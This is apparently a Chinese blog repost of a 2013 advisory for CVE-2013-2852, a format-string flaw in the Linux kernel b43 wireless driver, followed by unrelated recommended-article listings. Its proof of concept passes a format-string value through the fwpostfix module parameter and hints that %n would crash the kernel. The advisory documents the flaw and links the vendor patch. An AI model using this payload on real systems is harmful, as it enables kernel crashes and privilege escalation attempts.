Linux Kernel 'b43'无线驱动本地特权提升漏洞

最新推荐文章于 2024-09-14 16:36:34 发布
最新推荐文章于 2024-09-14 16:36:34 发布
阅读量93 收藏
点赞数
文章标签: git
原文链接:http://www.cnblogs.com/security4399/archive/2013/06/13/3134740.html
版权
漏洞版本:
Linux Kernel 3.9.4
漏洞描述:
CVE ID:CVE-2013-2852

Linux是一款开源的操作系统。

Linux b43无线驱动存在安全问题,允许本地攻击者利用漏洞提升权限。
b43无线驱动drivers/net/wireless/b43/main.c b43_request_firmware函数可使用"fwpostfix"模块参数来更改文件名用于获取固件,如果此文件没有找到的情况下,错误消息会把文件名以格式串处理,这可导致应用程序崩溃或可以从uid-0提权到ring-0。
<* 参考
https://bugzilla.redhat.com/show_bug.cgi?id=969518 
http://seclists.org/oss-sec/2013/q2/510
*>
测试方法:
提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
  1. # rmmod b43
  2. # modprobe b43 fwpostfix=AA%xBB
  3. ...
  4. # dmesg
  5. ...
  6. b43-0 ERROR:Firmware file "b43AAdeff80ccBB/a0g1bsinitvals5.fw"not found
  7.  
  8. Using%n instead of %x would lead to exciting crashes.:)
安全建议:
厂商解决方案

用户可参考如下厂商提供的安全公告获得补丁信息:
http://git.kernel.org/cgit/linux/kernel/git/linville/wireless.git/commit/?id=9538cbaab6e8b8046039b4b2eb6c9d614dc782bd

转载于:https://www.cnblogs.com/security4399/archive/2013/06/13/3134740.html

weixin_30740295
关注
内核--b43驱动问题
Welcome
12-31 1462
问题 在我的macbookpro8.1上,使用ubuntu16上的b43驱动成功实现连接wifi信号,但是编译新的linux4.15内核并在内核配置里边加了bcm4331的驱动,还是出现问题,只有wifi标识,没有wifi信号(似乎就是不能搜索wifi)。 ubuntu16自带的内核 说明 使用安装ubuntu16.04自己的内核4.10,可正常上网,但是编译新版本内核4.15,无法
深入探讨Linux驱动开发:驱动介绍与hello驱动实例
qq_52836452的博客
04-19 3263
通过之前对于IGKBoard开发板的应用层的学习与开发,现在已经进入了对Linux驱动的学习,对于Linux驱动的学习知识我也会在学习结束,总结汇总后发到我的博客当中,大家可以用作参考。对于Linux的程序开发分为应用程序开发与内核级驱动程序开发,分别对应Linux的用户态和内核态,用户态和内核态之间的交互主要通过系统调用(system call)来实现。系统调用是一种特殊的函数调用,用于在用户态的应用程序中请求操作系统内核执行特权操作,例如访问硬件设备、创建进程、进行文件操作等。
Linux kernel 配置选项
qq_28779021的博客
01-17 1万+
General setup 常规设置 Cross-compiler tool prefix CONFIG_CROSS_COMPILE 交叉编译工具前缀(比如"arm-linux-"相当于使用"make CROSS_COMPILE=arm-linux-"进行编译).除非你想配置后默认自动进行交叉编译,否则不要使用此选项. Local version - append to kernel rel...
Linux kernelb43_request_firmware’函数格式化字符串漏洞
weixin_30636089的博客
06-09 52
漏洞名称: Linux kernelb43_request_firmware’函数格式化字符串漏洞 CNNVD编号: CNNVD-201306-135 发布时间: 2013-06-08 更新时间: 2013-06-08 危害等级: 中危 漏洞类型: 格式化字符串 威胁类型: 本地 ...
linux kernel directory
hunter
03-05 2664
LINUX内核目录文件说明以及配置并编译内核的方法感谢原文作者以及原文翻译者的无私奉献   http://blog.csdn.net/ffmxnjm/article/details/72933915       在下载内核前,我们应该讨论一些重要的术语和事实。Linux内核是一个宏内核,这意味着整个操作系统都运行在内核预留的内存里。说的更清楚一些,内核是放在内存里的。内核所使用的空间是内核预留的。...
Kernel
weixin_47273943的博客
04-24 714
介绍Kernel的基本概念以及顶层目录结构
Linux嵌入式基础知识
PtaQ的博客
05-16 2436
该目录下存放的是设备与设备接口的文件,设备文件是Linux中特有的文件类型,在Linux系统下,以文件的方式访问各种设备,即通过读写某个设备文件操作某个具体硬件。该目录下存放系统命令,即只有系统管理员(俗称最高权限的root)能够使用的命令,系统命令还可以存放在/usr/sbin,/usr/local/sbin目录下,/sbin目录中存放的是基本的系统命令,它们用于启动系统和修复系统等,与/bin目录相似,在挂接其他文件系统之前就可以使用/sbin,所以/sbin目录必须和根文件系统在同一个分区中。
每个极客都应该知道的Linux技巧
摘取天上星
03-07 3223
是什么区分开普通的Linux用户和超级极客的呢?很简单:用在学习那些使长时工作转变为一瞬间工作的技巧、诀窍、秘诀和技术上的时间。如果你想提高效率而又不用做这些搜集资料的跑腿活儿,那我们已经收集了50多条简单易学的Linux技巧,以帮助你更潇洒地工作,并且最大限度的利用你的电脑。开始享受吧!   1:检查不是由你运行的程序 难度:高级 应用程序:bash(译注:UNIX或者L
Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)
weixin_33830216的博客
03-08 307
insight-labs · 2015/02/06 14:24from:http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/POC( 感谢Mickey提供的链接):rdot.org/forum/showt…Shawn:对...
Linux操作系统加固
悦分享
07-23 1487
如何尽可能地加强Linux的安全性和隐私性?以下列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。
剖析虚幻渲染体系(16)- 图形驱动的秘密
xuhss_com的博客
06-26 1965
目录* 16.1 本篇概述 + 16.1.1 本篇内容 + 16.1.2 设备驱动概述 + 16.1.3 图形驱动概述迄今为止,博主在博客中阐述的内容包含图形API、GPU、游戏引擎、Shader、渲染技术、性能优化等等技术范畴内容,但似乎还未涉及图形驱动的内幕。本篇将站在应用层开发者的视角,去阐述图形驱动的相关技术内幕(如果是驱动开发者,则博主不认为是目标读者),主要包含但不限于以下内容:要给“驱动”一词下一个准确的定义是一个挑战。从最基本的意义上讲,驱动程序是一个软件组件,它允许操作系统和设备相互通信。
模糊测试--强制性安全漏洞发掘
热门推荐
软件性能测试专栏
01-20 2万+
文档分享地址链接:http://pan.baidu.com/share/link?shareid=2723797392&uk=2485812037 密码:r43x 前 言 我知道"人类和鱼类能够和平共处" 。 --George W. Bush, 2000年9月29日 简介 模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序
KVM 安全策略配置实战
悦分享
01-16 577
cgroups(即control groups,控制群组)是Linux内核中的一个特性,用于限制、记录和隔离进程组(process groups)对系统物理资源的使用。cgroups最初是由Google的一些工程师(Paul Menage、Rohit Seth等人)在2006年以“进程容器”(process container)的名字实现的,在2007年被重命名为“控制群组”(Control Groups),然后被合并到Linux内核的2.6.24版本之中。
NISP
极光时流
07-21 2783
NISP七月份练习01 文章目录NISP七月份练习01NISP七月份练习02NISP七月份练习03NISP七月份练习04NISP七月份练习05NISP七月份练习06NISP七月份练习07NISP七月份练习08NISP七月份练习09NISP七月份练习10NISP七月份练习11NISP七月份练习12NISP七月份练习13NISP七月份练习14NISP七月份练习15NISP七月份练习16NISP七月份练习17NISP七月份练习18 1我国的( )主要规定了关于数据电文、电子签名与认证及相关的法律责任 A.《中华人
Github 2024-09-12 Go开源项目日报Top10
老孙正经胡说
09-12 522
创建周期:1890 天开发语言:Go协议类型:Apache License 2.0Star数量:2892 个Fork数量:2266 次关注人数:2892 人贡献人数:414 人Open Issues数量:876 个Github地址:https://github.com/open-telemetry/opentelemetry-collector-contrib.git项目首页: https://opentelemetry.io。
git-describe获取不到新创建的标签
Winter_Sun灬的博客
09-11 265
git-describe获取不到新创建的标签
git
qq_41751728的博客
09-14 318
请注意,git format-patch默认会为每个提交生成一个patch文件,但是通过使用–stdout选项,你可以将所有更改合并到一个文件中。这个命令会为每个提交生成一个patch文件。这种方法允许你精确控制哪些文件的更改被包含在patch中,非常适合在需要将特定文件的更改合并到一个patch文件中时使用。记住,生成的patch文件包含了提交的元数据,如作者、日期等,这有助于接收者更好地理解patch的上下文。这会将从HEAD~3到HEAD的更改合并到一个名为my_patch.patch的文件中。
搭建内网文件服务器(FTP),以及实现内网Gitee
最新发布
嵌入式C
09-14 207
具体步骤:1.打开控制面板,搜索功能2.打开这几个配置3.打开IIS,添加FTP站点即可。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值